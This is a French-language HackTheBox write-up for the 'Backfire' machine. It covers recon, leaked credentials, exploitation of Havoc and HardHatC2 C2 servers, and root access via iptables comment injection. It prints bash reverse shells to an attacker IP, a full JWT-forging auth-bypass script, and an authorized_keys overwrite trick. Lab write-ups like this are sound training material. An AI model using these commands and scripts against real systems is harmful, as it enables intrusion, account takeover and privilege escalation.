Backfire HackTheBox (Writeup)

Skills:

Information Leakage (Yaotl file)
Havoc-C2 Exploitation (Port 40046)
SSH Key Creation
Pivoting (User: Sergej)
HardHat Exploitation (Port 7096)
- HardHat - Bypass Authentication
- HardHat - Remote Code Execution
Sudo Privilege Escalation (IPTables)

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 -vvv 10.10.11.49 -oN allPorts

Scan de la version des ports avec Nmap: (22,443,8000)

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,443,8000 10.10.11.49 -oN targeted

Port 8000

Sur le port 8000, nous trouvons deux fichiers intéressants :

disable_tls.path
havoc.yaotl

Le fichier havoc.yaotl contient deux utilisateurs avec leurs mots de passe ainsi qu'un nom de domaine :

ilya: CobaltStr1keSuckz!
sergej: 1w4nt2sw1tch2h4rdh4tc2
Host: backfire.htb

Nous ajoutons ce nom d'hôte dans notre fichier /etc/hosts pour faciliter l'accès.

Le fichier disable_tls.path contient un patch pour désactiver TLS sur le port de gestion WebSocket (40056) dans Havoc. Ce patch remplace "wss://" par "ws://" et retire la configuration SSL pour le client et le serveur. L'auteur justifie ce changement en précisant que ce port n'accepte que les connexions locales via SSH forwarding, réduisant ainsi les risques de sécurité. Ce patch semble également être une ironie sur le manque de travail de l'utilisateur sergej.

Port 40046 Havoc-C2

GitHub - thisisveryfunny/CVE-2024-41570-Havoc-C2-RCE: This is a Chained RCE in the Havoc C2 framework using github.com/chebuya and github.com/IncludeSecurity pocsGitHub

Pour exploiter la vulnérabilité SSRF dans Havoc, nous créons un fichier payload.sh contenant le code suivant :

#!/bin/bash
 
bash -i >& /dev/tcp/10.10.14.254/4444 0>&1

Ensuite, nous mettons en place un serveur web pour héberger notre payload avec la commande suivante :

python3 -m http.server 80

Nous écoutons ensuite sur le port 4444 avec netcat pour recevoir la connexion inversée :

nc -nlvp 4444

Nous modifions le script pour y inclure les informations pertinentes, puis exécutons l'exploitation via la commande suivante :

python3 exploit.py -t https://backfire.htb -i 127.0.0.1 -p 40056

Accès utilisateur :

L'utilisateur ilya permet de se connecter à la machine cible.

Traitement de la terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag user.txt

Nous observons qu'une tâche cron expulse notre session toutes les 2 minutes. Pour contourner ce problème, nous allons créer des clés SSH.

Création de clés SSH :

Nous générons une nouvelle clé SSH en utilisant la commande suivante :

ssh-keygen -t rsa -b 4096 -f ~/.ssh/id_rsa

Nous modifions ensuite le fichier authorized_keys pour y ajouter notre clé publique :

echo "YOU KEY" | tee -a ~/.ssh/authorized_keys

Nous nous connectons ensuite à la machine cible en utilisant SSH :

ssh [email protected]

Pivoting utilisateur Sergej :

Dans le répertoire de l'utilisateur ilya, nous trouvons un fichier hardhat.txt contenant le message suivant :

Sergej a dit qu'il avait installé HardHatC2 pour effectuer des tests et n'avait pas modifié les paramètres par défaut. J'espère qu'il préfère Havoc car je ne veux pas apprendre un autre framework C2, et Go

Nous examinons les ports internes avec la commande netstat :

netstat -tuln

Les ports 5000 et 7096 semblent particulièrement intéressants.

Port forwarding :

Nous effectuons un port forwarding avec SSH pour accéder aux services internes :

ssh -L 5000:127.0.0.1:5000 -L 7096:127.0.0.1:7096 [email protected]

Port 7096 - HardHatC2 CMS :

Sur le port 7096, nous trouvons le CMS HardHat.

Bypass d'authentification HardHat C2 :

HardHatC2 0-Days (RCE & AuthN Bypass)Medium

Nous utilisons le script suivant pour contourner l'authentification et créer un nouvel utilisateur :

import jwt  
import datetime  
import uuid  
import requests  
  
rhost = '127.0.0.1:5000'  
  
# Craft Admin JWT  
secret = "jtee43gt-6543-2iur-9422-83r5w27hgzaq"  
issuer = "hardhatc2.com"  
now = datetime.datetime.utcnow()  
  
expiration = now + datetime.timedelta(days=28)  
payload = {  
"sub": "HardHat_Admin",  
"jti": str(uuid.uuid4()),  
"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier": "1",  
"iss": issuer,  
"aud": issuer,  
"iat": int(now.timestamp()),  
"exp": int(expiration.timestamp()),  
"http://schemas.microsoft.com/ws/2008/06/identity/claims/role": "Administrator"  
}  
  
token = jwt.encode(payload, secret, algorithm="HS256")  
print("Generated JWT:")  
print(token)  
  
# Use Admin JWT to create a new user 'sth_pentest' as TeamLead  
burp0_url = f"https://{rhost}/Login/Register"  
burp0_headers = {  
"Authorization": f"Bearer {token}",  
"Content-Type": "application/json"  
}  
burp0_json = {  
"password": "jordan12345",  
"role": "TeamLead",  
"username": "jordan"  
}  
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False)  
print(r.text)

Le script génère l'utilisateur jordan avec le rôle TeamLead.

Hardhat C2 (RCE)

Sur la partie ImplantInteract, nous avons accès à un terminal. En exécutant la commande whoami, nous voyons que nous sommes connectés en tant qu'utilisateur sergej.

Nous établissons une reverse shell pour l'utilisateur sergej en écoutant sur le port 443 :

nc -nlvp 443

Et exécutons la commande suivante pour établir la connexion inversée

bash -c "bash -i >& /dev/tcp/10.10.14.163/443 0>&1"

Une fois connecté, nous ajoutons notre clé SSH à authorized_keys pour pouvoir nous reconnecter facilement :

echo "your key" | tee -a ~/.ssh/authorized_keys

Élévation de privilèges :

Sudo - IP-Tables

Vérification des droits sudo

Nous commençons par vérifier les droits sudo disponibles sur la machine :

sudo -l

Nous découvrons que l'utilisateur dispose des droits sudo sans mot de passe pour les commandes suivantes :

/usr/sbin/iptables
/usr/sbin/iptables-save

Génération d’une paire de clés SSH

Nous générons une paire de clés SSH pour injecter notre clé publique dans les fichiers d'authentification de root :

ssh-keygen  -t ed25519

Voici la clé publique générée :

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAcikYtchlCaD+kDGQOFivZDZ27BZ4QodyiLhBAkTgNl jordan@parrot

Injection de la clé publique dans iptables

Nous utilisons le champ --comment d’iptables pour injecter notre clé publique dans une règle

sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAcikYtchlCaD+kDGQOFivZDZ27BZ4QodyiLhBAkTgNl jordan@parrot\n'

Nous vérifions que la règle a bien été ajoutée :

 sudo /usr/sbin/iptables -L

Sauvegarde dans le fichier authorized_keys

Nous sauvegardons les règles iptables dans un fichier qui sera utilisé comme fichier authorized_keys de l'utilisateur root :

sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys2

Connexion en tant que root

Enfin, nous pouvons nous connecter en SSH en tant que root :

ssh [email protected]

Flag root.txt :)

Mis à jour il y a 6 mois

Ce contenu vous a-t-il été utile ?